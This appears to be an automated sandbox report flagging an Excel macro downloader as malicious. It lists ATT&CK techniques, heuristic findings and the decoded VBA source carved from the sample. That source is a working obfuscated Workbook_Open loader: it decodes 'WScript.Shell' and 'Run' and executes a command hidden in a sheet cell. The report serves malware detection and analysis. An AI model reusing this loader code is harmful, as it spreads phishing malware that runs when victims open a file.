MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file contains obfuscated VBA and XLM macros, including a Workbook_Open event, indicating it's designed to execute malicious code upon opening. The presence of 'CreateObject' and 'CallByName' calls, along with the ClamAV detection signature 'Xls.Downloader.Valyria-6934924-0', strongly suggests a downloader functionality. The obfuscated nature of the VBA code points to an attempt to evade detection.
Heuristics (8)
- ClamAV: Xls.Downloader.Valyria-6934924-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.Valyria-6934924-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 228 bytes | 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2929 bytes | 4836b116305e4b266c8b8c2ecd4f50b3b169589a889c9714955c46873ce446f6 |

Preview of xlm_macros.txt (first 1,000 lines of the extracted script):
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Top
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function SDF_(ByVal OB_ As String)
Dim LQV_ As String: Dim NS_ As Long: For NS_ = 1 To Len(OB_) Step 2: LQV_ = LQV_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(OB_, NS_, 2)) - 10): Next: SDF_ = LQV_
End Function
Sub Workbook_Open()
Dim EXACCYAT_ As Long: EXACCYAT_ = 10
Dim GXJNMAV_ As Long
Select Case EXACCYAT_
Case 53 * Round(90 / 22 - 48) * 86 - (13 + 14) - 31 / Round(67 * 50 / 36) / 84
GXJNMAV_ = 5087 * 28
Case 85 * Round(53 / 21 - 42) * 26 * Round(18 / 86 - 58) * 31
GXJNMAV_ = 7590 * 51
Case 25 * Round(23 / 18 - 47) * 39 / Round(92 * 12 / 39) / 58
GXJNMAV_ = 2577 - 86
Case 60 * Round(51 / 19 - 61) * 42 + (31 - 45) + 36
GXJNMAV_ = 2413 + 55
Case 99 * Round(44 / 22 - 22) * 54 - (48 + 40) - 60 - (80 + 36) - 47
GXJNMAV_ = 4735 - 73
Case 94 / Round(45 * 16 / 30) / 66 / Round(27 * 12 / 68) / 34 + (9 - 47) + 81
GXJNMAV_ = 385 / 21
Case 61 / Round(64 * 9 / 14) / 33 + (68 - 90) + 97 - (76 + 14) - 32
GXJNMAV_ = 7780 * 22
Case 25 + (20 - 46) + 61 + (69 - 32) + 81 - (29 + 17) - 66
GXJNMAV_ = 3470 * 62
Case 99 * Round(33 / 62 - 70) * 76 + (99 - 52) + 88
GXJNMAV_ = 61 + 43
Case 68 / Round(17 * 98 / 67) / 25 + (56 - 96) + 66
GXJNMAV_ = 4318 + 59
Case 25 * Round(86 / 84 - 91) * 97 - (33 + 37) - 89
GXJNMAV_ = 2009 + 31
Case 74 * Round(77 / 10 - 76) * 45 * Round(22 / 79 - 38) * 15 - (37 + 42) - 84
GXJNMAV_ = 6800 + 84
Case 94 * Round(43 / 87 - 30) * 71 / Round(44 * 47 / 76) / 39 / Round(24 * 87 / 30) / 73
GXJNMAV_ = 7021 + 83
Case 75 * Round(97 / 44 - 70) * 55 / Round(11 * 75 / 82) / 50
GXJNMAV_ = 5022 / 87
Case 91 * Round(80 / 98 - 48) * 49 * Round(53 / 38 - 59) * 11 + (27 - 67) + 88
GXJNMAV_ = 6617 / 26
Case 73 - (23 + 20) - 74 * Round(82 / 46 - 92) * 35 * Round(95 / 10 - 21) * 57
GXJNMAV_ = 1228 + 45
Case 9 * Round(32 / 75 - 70) * 30 / Round(73 * 13 / 94) / 94 - (38 + 94) - 14
GXJNMAV_ = 4784 + 18
Case 31 * Round(87 / 56 - 25) * 26 / Round(36 * 54 / 37) / 25
GXJNMAV_ = 4274 / 11
Case 32 * Round(84 / 80 - 9) * 39 + (80 - 15) + 29 + (90 - 55) + 47
GXJNMAV_ = 352 / 73
Case 75 + (66 - 49) + 41 / Round(52 * 35 / 79) / 95 + (89 - 46) + 72
GXJNMAV_ = 4788 * 97
Case 98 - (35 + 46) - 69 * Round(74 / 27 - 86) * 35
GXJNMAV_ = 8668 * 22
Case 98 - (36 + 79) - 49 - (81 + 66) - 9
GXJNMAV_ = 3223 - 14
Case 38 * Round(28 / 23 - 95) * 48 / Round(60 * 60 / 17) / 63 / Round(79 * 59 / 21) / 58
GXJNMAV_ = 5909 + 27
Case Else: CallByName CreateObject(SDF_("615D6D7C737A7E385D726F7676")), SDF_("5C7F78"), VbMethod, SDF_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Select
End Sub